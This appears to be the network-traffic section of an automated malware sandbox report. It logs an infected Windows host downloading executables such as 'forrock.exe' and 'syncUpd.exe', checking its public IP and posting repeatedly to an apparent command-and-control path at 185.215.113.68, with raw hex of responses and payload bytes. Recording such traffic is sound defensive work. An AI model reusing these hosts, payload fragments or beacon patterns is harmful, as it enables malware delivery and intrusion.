ee ad 87 e4 bb 9b 62 e6 5e c7 00 73 85 a3 c3 bb b1 ca 57 af 70 Data Ascii: 1fa8}_\|Qcl<nEq]^8{fH9ZBL31l;:yIuM5yf7a$w77-rf?I!</zMu`!o@QCr@3sPu-\T+$A/}t<KL<Qrk5c@]VG/i_E!JsvaaAJ,F{p7xhw-SiRg:u jLF>~\|At@meF#Y>5&+ {>{r\|L`@+U:3\|O!%LQ2u6t2yrG\=S1@7$lRN9Lkzvd%xp>cajul)*=d!b~(D6Hv}X_;]tv'!n+$p>?C3YF w0+.2}7A4qBoT%EQAQV!s0e]Sq]F=)H= ;]3KmSv#V2CGZdRk2R^aN,TB4p@/BZz(\|?{'B\Con.``HY=$^QX3%^4D(t9RIF$n7;APqE^onC>mLr/U{>2C[hn~[?cN~jGs~%cK-&fR`&WaoIKGv>),`$[sHZg>_yQ`Ew&LQq!R~~]2jiXp1fL+T6u;O#b^sWp
Dec 27, 2023 18:13:05.279907942 CET	288	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uwjbvevcsotbkfts.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 247 Host: 185.215.113.68
Dec 27, 2023 18:13:05.577152014 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:05 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Dec 27, 2023 18:13:05.806015968 CET	284	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://khormimcksku.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 335 Host: 185.215.113.68
Dec 27, 2023 18:13:06.102536917 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:05 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0a e1 b0 c9 4e f1 b1 fb 9e 1a 14 f1 c9 e9 21 0c ff 1a a3 04 13 3c ff a7 d7 e4 d3 08 7b 4d 8a a4 75 b4 63 3d 54 21 6f 40 51 f8 43 8b 46 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 62 31 97 24 41 7f fe b3 ae 2f 7d c7 74 d7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 df a7 a4 ca 71 83 e8 b9 5f 65 22 18 2f 83 95 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff df 74 97 af a6 7b b2 1c 70 f5 92 37 cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 c0 a2 ca e8 b1 55 84 3a a6 bb 49 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 1b bf 78 51 79 fe 0e bb e0 47 e4 dc 09 53 e2 f9 de 87 b4 43 d6 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 d3 19 1f 1a 0b 46 fd 99 74 70 3e 94 63 61 6f c2 75 6e fd 29 2a 93 dc 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 59 ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 d8 5f 6b 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 f2 84 2d 6e 20 35 03 8d e4 24 bd 70 09 3c 3f 43 1e a8 cb cc 03 dd a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 0f 01 75 30 4a fe 6b 72 f2 7f b1 0c 73 2b 04 20 6d 42 fd 7a 5d 7a 07 c1 70 dc 66 57 ec fe db d3 cd b1 25 14 9a ee b3 2a 5e 34 51 79 48 ab c4 13 0f e4 4f 26 2a a0 6d 63 2b 4a 73 99 a4 bd 3c 99 0e c9 9c 0b 48 16 13 47 6d b8 76 a0 a6 c0 f1 59 3a b9 46 27 f2 81 da 70 1a 04 19 e5 4c 42 2b fc a0 74 54 f6 04 f8 11 b3 b4 26 c8 b9 27 9c c2 3c 25 59 45 6e d4 49 a6 38 9d c1 5f 05 46 02 35 ad e9 ce 1a 50 46 23 f1 02 ec a4 85 5a 84 40 ab 74 3d 58 4e 75 ee d9 4a 68 1b 03 79 fe ee 2e be bc 68 6a 69 6e 5d 61 03 e2 73 97 6a a9 8e 75 11 68 45 a0 f5 0f f1 e5 85 93 14 ad 8b e8 bb cd 2e 72 c8 f2 8b 55 ff e1 01 48 85 90 1f cf 06 e6 08 7c c1 93 45 83 0e ed e6 c7 8f 60 76 ab 39 18 b2 27 55 72 94 81 c2 55 dc 94 38 db cd 4d ca 84 e2 89 a7 b9 fa ca f1 e0 bf 3e 3c d6 34 47 b8 3a 32 a2 6f 14 7f 4e 0a 9c 60 55 0a 55 98 cc ee 75 90 97 b5 5d 7d 61 3b 4a 82 2b ee cc 67 d3 5b 12 03 14 46 aa 95 f0 bf 81 65 18 30 92 4d fd 61 05 e2 37 36 e8 a6 d0 de 0e e8 a2 a9 3a 7c ab 40 5a 31 b9 89 fd fb a7 be 0f 74 7f fd eb 7e f6 da 8f 3d 2a 59 dc 6c 0a 6d 83 fd 76 97 fa fc fc 7e 05 26 81 85 a8 f4 c3 83 8a b3 18 a5 97 a5 14 c6 ad af 4e 1f 40 63 c6 16 3c c8 39 25 0d 5e 16 a6 9f 75 23 61 18 14 f3 08 9d 05 cc 79 bc af a8 16 b7 89 19 52 21 a0 4d d0 e5 96 a3 e2 d1 08 8f 7e f5 28 c3 48 16 d3 60 71 9d ff 68 1e 05 ad eb a9 16 cb 4d c7 ed 6c 7c af 0c 67 0b bd 01 01 b2 ea c1 42 63 b0 75 1f 3d c3 e7 b1 43 47 10 61 74 5f c6 64 d1 9d 25 d1 15 77 56 9f 52 45 b2 5e 80 d7 77 16 d7 a6 f4 05 61 2b 77 05 5b ad e1 d1 e6 6e 60 df 55 b6 48 39 06 Data Ascii: 1fa8}_\|Qcl<nEq]^8{fH9ZBL31l;:yIuM5yf7a$w77-rfN!<{Muc=T!o@QCF@3sPu-\T+b1$A/}t<KL<Qrk5c@]Vq_e"/svaaAJ,t{p7xhw-SiRg:u jLF>~\|At@meF#Y>5&+ {>{r\|L`U:IO!%LQ2u6xQyGSC@7$lRN9LFtp>caoun)d!b~(OYD6Hv}_k;]t-n 5$p<?C3YF w0+.2u0Jkrs+ mBz]zpfW%^4QyHO&mc+Js<HGmvY:F'pLB+tT&'<%YEnI8_F5PF#Z@t=XNuJhy.hjin]asjuhE.rUH\|E`v9'UrU8M><4G:2oN`UUu]}a;J+g[Fe0Ma76:\|@Z1t~=Ylmv~&N@c<9%^u#ayR!M~(H`qhMl\|gBcu=CGat_d%wVRE^wa+w[n`UH9
Dec 27, 2023 18:13:09.103364944 CET	285	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rqyeuqhperhhh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 319 Host: 185.215.113.68
Dec 27, 2023 18:13:09.400439978 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:09 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Dec 27, 2023 18:13:09.441342115 CET	283	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gppyfgimsnr.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 150 Host: 185.215.113.68
Dec 27, 2023 18:13:09.738866091 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:09 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	5.42.65.125	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:21.910820961 CET	160	OUT	GET /forrock.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 5.42.65.125
Dec 27, 2023 18:12:22.157423019 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:22 GMT Content-Type: application/octet-stream Content-Length: 19755520 Last-Modified: Sun, 24 Dec 2023 05:03:49 GMT Connection: keep-alive ETag: "6587bbb5-12d7200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b5 bb 87 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 68 2d 01 00 08 00 00 00 00 00 00 2e 86 2d 01 00 20 00 00 00 a0 2d 01 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 2d 01 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 85 2d 01 53 00 00 00 00 a0 2d 01 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2d 01 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 66 2d 01 00 20 00 00 00 68 2d 01 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 04 00 00 00 a0 2d 01 00 06 00 00 00 6a 2d 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 2d 01 00 02 00 00 00 70 2d 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 86 2d 01 00 00 00 00 48 00 00 00 02 00 05 00 24 70 2d 01 b4 15 00 00 03 00 00 00 01 00 00 06 30 28 00 00 f2 47 2d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00 0a 13 06 11 05 11 06 28 0d 00 00 06 11 06 09 28 0f 00 00 06 06 17 58 0a 06 7e 0c 00 00 04 6f 15 00 00 0a 3f 2e ff ff ff 7e 08 00 00 04 26 2a 00 1b 30 02 00 2f 00 00 00 02 00 00 11 02 73 16 00 00 0a 0a 73 17 00 00 0a 0b 06 16 73 18 00 00 0a 0c 08 07 6f 19 00 00 0a de 0a 08 2c 06 08 6f 1a 00 00 0a dc 07 6f 1b 00 00 0a 2a Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELeh-.- -@ -@-S-- H.text4f- h- `.rsrc-j-@@.reloc-p-@B-H$p-0(G-0_~,(,(~,(,(~,(,(~,(,(~,~ Z(~,rprp(&8~o~o~o~o(~,(~rp(,(rpo(+)~r1p(,(rpo(((((X~o?.~&0/ssso,oo
Dec 27, 2023 18:12:22.157437086 CET	1286	IN	Data Raw: 00 01 10 00 00 02 00 15 00 09 1e 00 0a 00 00 00 00 13 30 06 00 28 00 00 00 03 00 00 11 02 8e 69 8d 1a 00 00 01 0a 16 0b 2b 13 06 07 02 07 91 03 07 03 8e 69 5d 91 61 d2 9c 07 17 58 0b 07 02 8e 69 32 e7 06 2a 36 02 03 28 06 00 00 06 28 01 00 00 2b Data Ascii: 0(i+i]aXi26((+0c (~-s~(+(++ i]XX _(X 2(!*0w{X _}
Dec 27, 2023 18:12:22.157449007 CET	1286	IN	Data Raw: 70 6f 46 00 00 0a 2d 1c 08 72 23 02 00 70 6f 42 00 00 0a 6f 43 00 00 0a 72 4d 02 00 70 28 10 00 00 0a 2c 05 17 13 04 de 34 11 05 6f 47 00 00 0a 3a 7a ff ff ff de 0c 11 05 2c 07 11 05 6f 1a 00 00 0a dc de 0a 07 2c 06 07 6f 1a 00 00 0a dc de 0a 06 Data Ascii: poF-r#poBoCrMp(,4oG:z,o,o,o(0rcp((I,0(JoK(&*06(L(M(
Dec 27, 2023 18:12:22.157461882 CET	1286	IN	Data Raw: c0 5d 74 1e 74 12 77 00 00 22 02 6f 00 67 a0 28 00 72 04 33 00 67 3e 31 00 6b 00 77 00 69 00 63 00 6f 00 67 00 2a 00 72 c0 1d 72 14 72 10 00 6b 00 9f 07 26 00 63 b0 2d 00 67 28 6b 00 72 42 71 00 67 00 73 00 6b 00 77 00 69 00 63 00 2f 00 67 40 6a Data Ascii: ]ttw"og(r3g>1kwicog*rrrk&c-g(krBqgskwic/g@jr3gskwicogjr3gskwicogjr3gskwicogjr3gskwicogjr3gskwicogjr3gskwicogjr3gskwicogjr3g
Dec 27, 2023 18:12:22.157474995 CET	1286	IN	Data Raw: 27 4a 00 67 33 aa 33 84 39 46 0c 68 95 b3 3b ad 75 6a e8 d1 1c 63 00 a8 00 71 00 6a 00 24 56 65 56 31 e8 56 1c 6b 00 f4 c4 7d 83 ab ff 84 38 8f 41 49 00 72 50 65 e8 35 24 73 00 32 59 fe 75 95 ff 16 14 90 75 77 ff 1f 0c 9a 27 10 00 67 50 8c 55 63 Data Ascii: 'Jg339Fh;ujcqj$VeV1Vk}8AIrPe5$s2Yuuw'gPUcE3g6RiPDjP$$gYUEcPuzhA;'b>27cuch;)D/2.'jiE,@jUc]UEPuf[E,@sbs]
Dec 27, 2023 18:12:22.157507896 CET	1286	IN	Data Raw: 68 58 73 33 00 83 86 8a ff 96 83 a7 18 ec f8 99 75 21 e8 c0 17 33 00 e4 38 51 75 00 e8 df 17 69 00 ea 38 84 62 ec 18 3d 56 1a 3f 40 40 67 e8 2e fd 94 ff 44 c9 ea c4 7b 66 e6 4c 19 fe e9 f8 8c 75 2a 83 1a 10 8c 75 70 e8 0b 17 69 00 e0 38 4d 75 52 Data Ascii: hXs3u!38Qui8b=V?@@g.D{fLu*upi8MuRr,@P)P\dFUdkw"icS<S4Sd3_)[4:usu{/2usubhs]Uukuyuoh2
Dec 27, 2023 18:12:22.157569885 CET	1286	IN	Data Raw: 68 98 1c 2f 00 8f 44 1c 00 72 83 f7 24 c4 00 43 82 6b 5e b4 8b 96 55 e8 ec ec 3d 5b 53 e8 00 73 75 36 e8 17 7e 73 00 94 75 7f e8 fe 7c 63 00 07 ff 67 00 6a e8 dd fc cc ff 3e 59 2e c3 d3 4d 2d 00 69 66 5a 05 6f 00 27 00 1f 36 d3 3c 33 40 67 81 cb Data Ascii: h/Dr$Ck^U=[Ssu6~su\|cgj>Y.M-ifZo'6<3@gk@wP,cuJlj9g@su\|ti@cTSshDj;hh33EP5M=sfRw)8<g@j3@gP6kuPbc9j@ru*ts@kZZ'e~u3C:
Dec 27, 2023 18:12:22.157582998 CET	1286	IN	Data Raw: 60 43 fd a4 8b b2 c3 e0 ff 22 8b 85 8b 26 08 ec 00 63 8b 6a 8b 32 fc 6e c3 ec ff 26 8b 87 8b 32 08 ea 00 67 8b 6f 66 ec 40 96 5d b1 8b cc 55 ec ec f2 ec 13 02 77 00 c8 08 53 82 6f 33 a2 89 2f fc 21 8b 6e 0c 31 8b 06 08 58 c0 20 8b 14 14 9c 75 7f Data Ascii: `C"&cj2n&2gof@]UwSo3/!n1X u5!3gsk3P9P3Pkjkt}pms-7u7VgY D3tw
Dec 27, 2023 18:12:22.157593966 CET	1286	IN	Data Raw: ff ae 85 ab fd 90 ff 66 00 6a 00 9b 7f 37 00 67 83 9b 58 64 84 ad 02 69 00 2b 48 1b 79 4c c1 65 84 55 ff cc ff 2f 48 7c 85 f5 04 77 00 ea c7 67 f7 ea f0 9a ff 95 10 7a 00 33 89 da dc 8e ff 94 74 47 0f de 47 9f 50 07 00 65 00 6a 8d f7 f4 ce ff 98 Data Ascii: fj7gXdi+HyLeU/H\|wgz3tGGPejP9ozt,wip(jw5csl\;H7;tGko+gj3jc07k.
Dec 27, 2023 18:12:22.157608032 CET	1286	IN	Data Raw: fd 8d ff 13 c7 e2 d0 8e ff 94 01 77 00 69 8b fe cc 92 ff 98 2b f7 e0 8f ff cc 2b fa d0 8e ff 94 f6 f2 f0 94 ff 9c 0c 1a 17 98 b5 de fd 8d ff be 85 bf fd 8c ff 38 6a 57 e8 ec c9 63 00 ec c4 6b ff df d0 8f ff cc 8b da b4 8e ff 94 8d f2 d8 94 ff 9c Data Ascii: wi++8jWck3Ynu`W`jW*ckfb\|mPEP5P-jiuB9tS'g0us
Dec 27, 2023 18:12:22.401885033 CET	1286	IN	Data Raw: 8d 32 e0 39 53 8b ef 81 ff 98 59 33 8b b4 5e 68 c9 a4 8b 8c 55 e0 ec 88 75 79 6a 63 ff 1a 0c 98 75 62 e8 1f ff cc ff e4 c4 63 5d a8 8b 88 55 e2 ec e0 ec 4f 56 54 f6 53 75 7e 75 2e e8 0d fe 8c ff 3d 56 21 56 3f c7 63 16 6f 00 67 e8 bd fd 8d ff b0 Data Ascii: 29SY3^hUuyjcubc]UOVTSu~u.=V!V?cogs'u}&uw/u.5i3u'w^"ubh"s4:u?I@ww]UujkJ@o>#]Uuyuoh 2<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	104.237.62.212	80	8140	C:\Users\user\AppData\Local\Temp\InstallSetup8.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:39.965737104 CET	133	OUT	GET /?format=dfg HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: api.ipify.org Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:12:40.117049932 CET	174	IN	HTTP/1.1 200 OK Server: nginx/1.25.2 Date: Wed, 27 Dec 2023 17:12:40 GMT Content-Type: text/plain Content-Length: 12 Connection: keep-alive Vary: Origin Data Raw: 32 31 32 2e 31 30 32 2e 34 31 2e 32 Data Ascii: 212.102.41.2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	91.92.254.7	80	8140	C:\Users\user\AppData\Local\Temp\InstallSetup8.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:40.722086906 CET	170	OUT	GET /scripts/plus.php?ip=212.102.41.2&substr=eight&s=ab HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: 91.92.254.7 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:12:41.319864035 CET	204	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:12:40 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49745	5.42.64.35	80	8140	C:\Users\user\AppData\Local\Temp\InstallSetup8.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:12:41.624064922 CET	130	OUT	GET /syncUpd.exe HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: 5.42.64.35 Connection: Keep-Alive Cache-Control: no-cache
